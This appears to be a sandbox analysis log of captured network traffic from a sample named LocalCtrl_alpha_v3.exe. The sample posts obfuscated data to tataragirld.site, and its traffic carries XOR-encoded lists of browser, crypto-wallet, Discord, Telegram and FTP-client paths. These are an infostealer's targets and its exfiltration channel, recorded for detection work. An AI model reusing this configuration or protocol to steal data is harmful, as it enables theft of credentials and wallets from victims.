                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3vEAkGrZIXwFLbXi0V58GqBgBeQRlKJQAtCX1a42vvFjYidC1ltVsLAEcnDuGImkF7FgWOtlqW01e%2FKyaqIE9KDOruFLGVL1sXryJJ5HiBfB4ukwZn2zCIJ%2Fo7%2FLD9BeTFq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e591089142d8-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1923&rtt_var=730&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1174&delivery_rate=1491317&cwnd=222&unsent_bytes=0&cid=9d75a8214e0f8048&ts=471&x=0"
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 33 32 66 32 0d 0a 87 86 00 00 9f df e8 1e 00 00 00 00 00 00 00 00 0d 00 c3 04 14 00 f8 03 69 10 18 05 07 03 df 08 df 36 f8 03 78 b1 77 a6 3d 50 99 33 75 73 6d 5f 53 71 6c 77 6c 6d 55 53 4d 08 00 65 01 14 00 7f 06 1d 10 18 05 07 03 cc 08 cc 36 7f 06 aa 49 5d cd 2d cd b0 e1 a4 4b 94 f0 ea cb c0 a1 08 00 b6 02 14 00 34 0e 93 10 18 05 07 03 cc 08 cc 36 34 0e 2d 13 fe 36 73 56 b9 6b dc ee c8 f4 4b af 36 d4 04 00 43 03 10 00 44 01 b5 10 18 05 07 03 dc 04 dc 36 44 01 6e fd a9 e8 02 83 5f 37 04 00 4e 04 14 00 7f 09 8b 10 18 05 07 03 df 08 df 36 7f 09 78 b1 77 a6 3d 50 99 33 60 6b 62 77 08 00 f2 0c 14 00 c7 0c 8e 10 18 05 07 03 df 08 df 36 c7 0c 78 b1 77 a6 3d 50 99 33 54 66 61 23 47 62 77 62 05 00 6c 06 14 00 00 0c 8e 10 18 05 07 03 df 08 df 36 00 0c 78 b1 77 a6
                                                                                                                                                                                                                                                                                                Data Ascii: 32f2i6xw=P3usm_SqlwlmUSMe6I]-K464-6sVkK6CD6Dn_7N6xw=P3`kbw6xw=P3Tfa#Gbwbl6xw
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 50 4c 45 57 54 42 51 46 5f 51 66 64 6a 70 77 66 71 66 67 42 73 73 6f 6a 60 62 77 6a 6c 6d 70 04 00 e8 02 10 00 25 09 93 10 18 05 07 03 dc 04 dc 36 25 09 30 cd df c3 5d 52 dc 19 04 00 69 05 10 00 63 06 b5 10 18 05 07 03 dc 04 dc 36 63 06 8e 07 94 ce e2 98 97 14 0b 00 03 08 14 00 de 0a 8b 10 18 05 07 03 df 08 df 36 de 0a 78 b1 77 a6 3d 50 99 33 42 6d 7a 47 66 70 68 2d 66 7b 66 01 00 37 0d 14 00 63 0a b5 10 18 05 07 03 df 08 df 36 63 0a 78 b1 77 a6 3d 50 99 33 29 08 00 10 05 14 00 3d 0e 93 10 18 05 07 03 cc 08 cc 36 3d 0e c6 b6 ce fc 8c 2a 37 53 37 4b f8 3e b4 d3 b8 ec 08 00 69 02 14 00 73 0e 8e 10 18 05 07 03 cc 08 cc 36 73 0e 8f e2 7b 52 48 5f 67 48 7b 1f 4d 90 70 a6 e8 f7 12 00 5a 05 14 00 b1 08 b5 10 18 05 07 03 df 08 df 36 b1 08 78 b1 77 a6 3d 50 99 33
                                                                                                                                                                                                                                                                                                Data Ascii: PLEWTBQF_QfdjpwfqfgBssoj`bwjlmp%6%0]Ric6c6xw=P3BmzGfph-f{f7c6cxw=P3)=6=*7S7K>is6s{RH_gH{MpZ6xw=P3
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: b5 66 58 c8 39 d9 ba 50 3a d9 14 00 79 07 14 00 04 0f 8b 10 18 05 07 03 df 08 df 36 04 0f 78 b1 77 a6 3d 50 99 33 60 6c 6d 6d 66 60 77 6a 6c 6d 5c 77 71 62 60 66 2d 77 7b 77 22 00 9a 09 14 00 02 0b ab 10 18 05 07 03 df 08 df 36 02 0b 78 b1 77 a6 3d 50 99 33 6e 66 70 70 66 6d 64 66 71 70 5f 47 6a 70 60 6c 71 67 5f 47 66 75 66 6f 6c 73 6e 66 6d 77 5f 68 66 7a 04 00 ec 04 10 00 4f 07 a6 10 18 05 07 03 dc 04 dc 36 4f 07 e7 03 4f 14 8a 9c 4c ce 12 00 31 04 14 00 9d 01 ee 10 18 05 07 03 df 08 df 36 9d 01 78 b1 77 a6 3d 50 99 33 65 6c 71 6e 6b 6a 70 77 6c 71 7a 2d 70 72 6f 6a 77 66 35 00 6a 09 14 00 f9 0b 8e 10 18 05 07 03 df 08 df 36 f9 0b 78 b1 77 a6 3d 50 99 33 40 39 5f 53 71 6c 64 71 62 6e 23 45 6a 6f 66 70 5f 44 6c 6c 64 6f 66 5f 40 6b 71 6c 6e 66 5f 42 73
                                                                                                                                                                                                                                                                                                Data Ascii: fX9P:y6xw=P3`lmmf`wjlm\wqb`f-w{w"6xw=P3nfppfmdfqp_Gjp`lqg_Gfufolsnfmw_hfzO6OOL16xw=P3elqnkjpwlqz-projwf5j6xw=P3@9_Sqldqbn#Ejofp_Dlldof_@kqlnf_Bs
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 77 6c 6e 6a 60 04 00 0b 05 10 00 6a 0b 69 10 18 05 07 03 dc 04 dc 36 6a 0b 6f dd c3 82 03 46 c0 58 01 00 dc 05 14 00 dd 07 b5 10 18 05 07 03 df 08 df 36 dd 07 78 b1 77 a6 3d 50 99 33 29 04 00 08 09 10 00 50 0e b5 10 18 05 07 03 dc 04 dc 36 50 0e 32 f3 aa bb 5e 6c a9 61 1f 00 d8 0e 14 00 ae 01 b5 10 18 05 07 03 df 08 df 36 ae 01 78 b1 77 a6 3d 50 99 33 46 75 66 71 2e 50 76 71 65 5f 4f 6c 60 62 6f 23 50 77 6c 71 62 64 66 5f 6f 66 75 66 6f 67 61 04 00 82 07 10 00 f3 0d 8e 10 18 05 07 03 dc 04 dc 36 f3 0d 8b 5c a1 45 e6 c3 a2 9f 0a 00 17 0c 14 00 61 09 69 10 18 05 07 03 df 08 df 36 61 09 78 b1 77 a6 3d 50 99 33 60 6c 6d 65 6a 64 5c 67 6a 71 07 00 45 09 14 00 51 00 93 10 18 05 07 03 df 08 df 36 51 00 78 b1 77 a6 3d 50 99 33 4c 76 77 6f 6c 6c 68 0c 00 32 02 14
                                                                                                                                                                                                                                                                                                Data Ascii: wlnj`ji6joFX6xw=P3)P6P2^la6xw=P3Fufq.Pvqe_Ol`bo#Pwlqbdf_ofufoga6\Eai6axw=P3`lmejd\gjqEQ6Qxw=P3Lvwollh2
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 3d 50 99 33 41 71 62 75 66 50 6c 65 77 74 62 71 66 5f 41 71 62 75 66 2e 41 71 6c 74 70 66 71 5f 42 73 73 6f 6a 60 62 77 6a 6c 6d 5f 61 71 62 75 66 2d 66 7b 66 0d 00 87 0f 14 00 18 09 8e 10 18 05 07 03 df 08 df 36 18 09 78 b1 77 a6 3d 50 99 33 4f 6c 60 62 6f 23 50 77 6c 71 62 64 66 05 00 9c 02 14 00 36 09 8b 10 18 05 07 03 df 08 df 36 36 09 78 b1 77 a6 3d 50 99 33 29 2d 71 67 73 08 00 06 02 14 00 19 08 8e 10 18 05 07 03 cc 08 cc 36 19 08 8d 80 b6 cc 42 4f b6 2a 79 7d 80 0e 7a b6 39 95 0e 00 18 0a 14 00 4a 02 b5 10 18 05 07 03 df 08 df 36 4a 02 78 b1 77 a6 3d 50 99 33 4e 6c 6d 66 71 6c 5f 74 62 6f 6f 66 77 70 0a 00 61 0a 14 00 14 07 8e 10 18 05 07 03 df 08 df 36 14 07 78 b1 77 a6 3d 50 99 33 66 7b 77 66 6d 70 6a 6c 6d 70 0a 00 54 07 14 00 87 0a 49 10 18 05
                                                                                                                                                                                                                                                                                                Data Ascii: =P3AqbufPlewtbqf_Aqbuf.Aqltpfq_Bssoj`bwjlm_aqbuf-f{f6xw=P3Ol`bo#Pwlqbdf666xw=P3)-qgs6BO*y}z9J6Jxw=P3Nlmfql_tboofwpa6xw=P3f{wfmpjlmpTI
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 3d 50 99 33 74 62 6f 6f 66 77 70 5f 49 62 7b 7b 4f 6a 61 66 71 77 7a 5f 60 6c 6e 2d 6f 6a 61 66 71 77 7a 2d 69 62 7b 7b 5f 4a 6d 67 66 7b 66 67 47 41 5f 65 6a 6f 66 5c 5c 33 2d 6a 6d 67 66 7b 66 67 67 61 2d 6f 66 75 66 6f 67 61 04 00 67 01 10 00 29 06 8e 10 18 05 07 03 dc 04 dc 36 29 06 22 42 86 55 4e d9 85 8f 42 00 5e 0f 14 00 4e 0b 8e 10 18 05 07 03 df 08 df 36 4e 0b 78 b1 77 a6 3d 50 99 33 40 39 5f 53 71 6c 64 71 62 6e 23 45 6a 6f 66 70 5f 41 71 62 75 66 50 6c 65 77 74 62 71 66 5f 41 71 62 75 66 2e 41 71 6c 74 70 66 71 5f 42 73 73 6f 6a 60 62 77 6a 6c 6d 5f 61 71 62 75 66 2d 66 7b 66 07 00 a9 08 14 00 84 0c 8e 10 18 05 07 03 df 08 df 36 84 0c 78 b1 77 a6 3d 50 99 33 4b 6a 70 77 6c 71 7a 04 00 da 0b 10 00 2b 01 8e 10 18 05 07 03 dc 04 dc 36 2b 01 54 bd
                                                                                                                                                                                                                                                                                                Data Ascii: =P3tboofwp_Ib{{Ojafqwz_`ln-ojafqwz-ib{{_Jmgf{fgGA_ejof\\3-jmgf{fgga-ofufogag)6)"BUNB^N6Nxw=P3@9_Sqldqbn#Ejofp_AqbufPlewtbqf_Aqbuf.Aqltpfq_Bssoj`bwjlm_aqbuf-f{f6xw=P3Kjpwlqz+6+T
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 55 53 4d 5f 60 6c 6d 65 6a 64 08 00 07 05 14 00 75 06 a6 10 18 05 07 03 cc 08 cc 36 75 06 9a 2e 15 f7 88 7b 40 40 6b d3 23 35 b0 82 cf ff 04 00 64 06 10 00 2f 0a 93 10 18 05 07 03 dc 04 dc 36 2f 0a 65 12 f8 6f 08 8d fb b5 04 00 98 0b 10 00 5f 04 b5 10 18 05 07 03 dc 04 dc 36 5f 04 c6 d7 a7 7e aa 4c a4 a4 0b 00 86 06 14 00 dc 0d 93 10 18 05 07 03 df 08 df 36 dc 0d 78 b1 77 a6 3d 50 99 33 57 6b 76 6d 67 66 71 61 6a 71 67 1a 00 a8 01 14 00 bd 04 49 10 18 05 07 03 df 08 df 36 bd 04 78 b1 77 a6 3d 50 99 33 53 71 6c 64 71 62 6e 70 5f 54 6a 6d 50 40 53 5f 54 6a 6d 50 40 53 2d 6a 6d 6a 08 00 4d 08 14 00 a7 0c 8e 10 18 05 07 03 cc 08 cc 36 a7 0c c0 10 8a b3 c2 60 c5 72 30 ed bc 71 fa 99 4a cd 05 00 fb 02 14 00 3b 07 a6 10 18 05 07 03 df 08 df 36 3b 07 78 b1 77 a6
                                                                                                                                                                                                                                                                                                Data Ascii: USM_`lmejdu6u.{@@k#5d/6/eo_6_~L6xw=P3WkvmgfqajqgI6xw=P3Sqldqbnp_TjmP@S_TjmP@S-jmjM6`r0qJ;6;xw
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: b6 6c da 08 00 af 00 14 00 65 07 93 10 18 05 07 03 cc 08 cc 36 65 07 cb 7b b3 9e 72 ef b4 56 3e 86 85 5c 4a 16 3b e9 11 00 91 02 14 00 88 0b a6 10 18 05 07 03 df 08 df 36 88 0b 78 b1 77 a6 3d 50 99 33 50 4c 45 57 54 42 51 46 5f 57 6a 64 6b 77 55 4d 40 08 00 66 0d 14 00 58 0a 04 10 18 05 07 03 df 08 df 36 58 0a 78 b1 77 a6 3d 50 99 33 6b 62 71 67 74 62 71 66 04 00 b7 00 10 00 53 0e a6 10 18 05 07 03 dc 04 dc 36 53 0e 8c 75 e9 48 68 f9 ea 92 04 00 06 06 10 00 0a 05 b5 10 18 05 07 03 dc 04 dc 36 0a 05 df 2c 55 60 b2 b3 56 ba 0a 00 72 00 14 00 80 08 49 10 18 05 07 03 df 08 df 36 80 08 78 b1 77 a6 3d 50 99 33 53 6c 71 77 4d 76 6e 61 66 71 0b 00 9d 0e 14 00 5d 07 b5 10 18 05 07 03 df 08 df 36 5d 07 78 b1 77 a6 3d 50 99 33 49 62 7b 7b 4f 6a 61 66 71 77 7a 29 00
                                                                                                                                                                                                                                                                                                Data Ascii: le6e{rV>\J;6xw=P3PLEWTBQF_WjdkwUM@fX6Xxw=P3kbqgtbqfS6SuHh6,U`VrI6xw=P3SlqwMvnafq]6]xw=P3Ib{{Ojafqwz)
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC1369INData Raw: 08 00 0c 03 14 00 db 03 8b 10 18 05 07 03 cc 08 cc 36 db 03 03 f8 91 9b 14 15 86 43 f3 05 a7 59 2c ec 09 fc 0b 00 aa 02 14 00 b9 08 b5 10 18 05 07 03 df 08 df 36 b9 08 78 b1 77 a6 3d 50 99 33 74 62 6f 6f 66 77 5c 73 62 77 6b 06 00 12 0d 14 00 89 00 8b 10 18 05 07 03 df 08 df 36 89 00 78 b1 77 a6 3d 50 99 33 2d 60 71 66 67 70 08 00 47 0b 14 00 ae 00 93 10 18 05 07 03 cc 08 cc 36 ae 00 61 fa f6 6f 9f 34 29 6c 94 07 c0 ad a7 cd a6 d3 04 00 a7 0a 10 00 df 0c b5 10 18 05 07 03 dc 04 dc 36 df 0c 79 75 64 e0 14 ea 67 3a 08 00 2d 08 14 00 f6 09 a6 10 18 05 07 03 cc 08 cc 36 f6 09 2b f0 8c af 63 7d 16 22 da 0d ba 6d 5b 84 99 9d 04 00 51 0f 10 00 43 0f ab 10 18 05 07 03 dc 04 dc 36 43 0f 09 db 06 86 65 40 05 5c 04 00 72 05 10 00 52 0d 93 10 18 05 07 03 dc 04 dc 36
                                                                                                                                                                                                                                                                                                Data Ascii: 6CY,6xw=P3tboofw\sbwk6xw=P3-`qfgpG6ao4)l6yudg:-6+c}"m[QC6Ce@\rR6


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                19192.168.2.750091188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC501OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 212
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC212OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 99 00 00 00 b9 96 dc 04 88 00 00 00 08 00 00 00 04 03 03 03 ba 95 df 07 03 03 03 03 03 03 03 03 90 c3 c3 91 c3 92 03 61 03 03 03 ba 95 df 07 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: aSH/..SHSHx$S3
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC838INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:32 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLsEC6Wso4o13VcMZDnx2TWqolj5B8%2BL3GLqEqCHYIbE5Wd04RR2NQaAyvuftK%2F5vSw0RLxqfeNrCpjuqxcdr4RQxdOm0ZvasAh5jDEQSVMiiFuDWSrIsko2OH%2BMCSXYQMVH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e591ea5018ea-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1457&rtt_var=581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1349&delivery_rate=1829573&cwnd=244&unsent_bytes=0&cid=5e765ce26dca5751&ts=324&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                20192.168.2.750092188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC501OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 380
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC380OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 88 e8 10 1b 88 00 00 00 08 00 00 00 00 03 03 03 8b eb 13 18 03 03 03 03 03 03 03 03 91 c3 93 61 03 03 03 8b eb 13 18 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 94 00 00 00 45 fb 3a 38 88 00 00 00 08 00 00 00 01 03 03 03 46 f8 39 3b 03 03 03 03 03 03 03 03 92 93 61 03 03 03 46 f8 39 3b 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e
                                                                                                                                                                                                                                                                                                Data Ascii: aSH/..SHSHx$S3E:8F9;aF9;SH/.
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC834INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:33 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FUqigZp2gXdmAmWK2i0wroMysL2Na3DKgUlO8jsAUD324YIhMOJu7QwBeLu1KPe3l0SpJGi5nVgElSuk1YGiGVRLQONfEGfbU1E6tQKAflOeecGNmzqIvScgaERpey27SOq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59769f64358-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1517&delivery_rate=1789215&cwnd=206&unsent_bytes=0&cid=458702b1b227f742&ts=294&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                21192.168.2.750093188.114.97.34435440C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC500OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:33 UTC53OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 03 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:34 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdmDLvnnbdgJgEcmBNrieKQrIH5TMPa87Rv8epNSZjs0d690le1esruI5%2BvGQO0htmeI4y5zErSMvEASDjc8zYII3VqzcZPBf9qRRuoE7%2BUS%2FlGNDleAjFyZ16CX%2FPxePHD%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e598d934c3ee-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1493&rtt_var=576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1189&delivery_rate=1871794&cwnd=247&unsent_bytes=0&cid=224f5d1f0d09a3ed&ts=314&x=0"
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC74INData Raw: 34 34 0d 0a 34 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 9a ce 13 46 04 fb ce 0f 15 64 32 ce 27 2a d8 6f ce 17 c1 ba e8 ce 04 dc 96 b9 ce 35 95 aa a6 ce 12 24 ea 41 ce 3f 61 53 c9 ce 1b 10 e8 88 ce 38 3a fb 45 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 444Fd2'*o5$A?aS8:E
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                22192.168.2.750094188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC502OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC9953OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 a6 26 00 00 38 ba fa 37 88 00 00 00 08 00 00 00 07 03 03 03 3b b9 f9 34 03 03 03 03 03 03 03 03 90 c3 03 93 71 25 03 03 3b b9 f9 34 03 03 03 03 03 03 03 03 53 48 00 07 2e 03 03 0b 0b 03 0f 04 27 54 94 30 ba 9d fc fc fc fc fc fc fc fc 19 03 17 03 44 71 62 61 61 66 71 5f 67 66 70 5f 41 5b 42 49 56 49 42 4c 46 4c 2d 69 73 64 02 03 13 03 01 07 03 03 03 03 03 03 04 07 03 03 03 03 03 03 02 01 07 fe f8 41 5b 42 49 56 49 42 4c 46 4c 59 53 5a 52 55 4e 53 4e 4e 53 5b 5b 4e 55 40 53 50 4f 57 57 4f 56 4c 4f 5a 5a 52 56 52 48 4f 51 4e 4c 52 4d 45 54 46 4c 40 5a 47 4c 4f 4a 57 53 40 55 47 4f 5a 50 54 5a 52 42 40 59 46 49 4a 47 4a 4f 4e 4d 4c 4c 56 55 46 55 41 4c 50 54 53 5b 5a 4f 41 4c 44 45 5a 54 4b 59 55 45 4d
                                                                                                                                                                                                                                                                                                Data Ascii: &87;4q%;4SH.'T0Dqbaafq_gfp_A[BIVIBLFL-isdA[BIVIBLFLYSZRUNSNNS[[NU@SPOWWOVLOZZRVRHOQNLRMETFL@ZGLOJWS@UGOZPTZRB@YFIJGJONMLLVUFUALPTS[ZOALDEZTKYUEM
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:35 UTC844INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:34 GMT
                                                                                                                                                                                                                                                                                                Connection: close
